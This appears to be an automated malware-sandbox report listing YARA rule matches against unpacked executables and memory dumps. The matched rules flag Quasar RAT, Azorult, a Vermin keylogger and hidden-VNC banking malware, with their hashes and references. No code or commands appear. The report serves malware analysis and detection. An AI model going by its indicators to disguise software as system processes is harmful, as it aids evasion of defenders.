                      Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                      Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE, Matched rule: Vermin_Keylogger_Jan18_1, date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen, date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE, Matched rule: xRAT_1, date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_2, date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_QuasarRAT_May19_1, date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE, Matched rule: CN_disclosed_20180208_KeyLogger_1, date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic, date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen, date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic, date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_2, date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_QuasarRAT_May19_1, date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_2, date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_QuasarRAT_May19_1, date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY, Matched rule: crime_win32_hvnc_banker_gen, date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic, date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
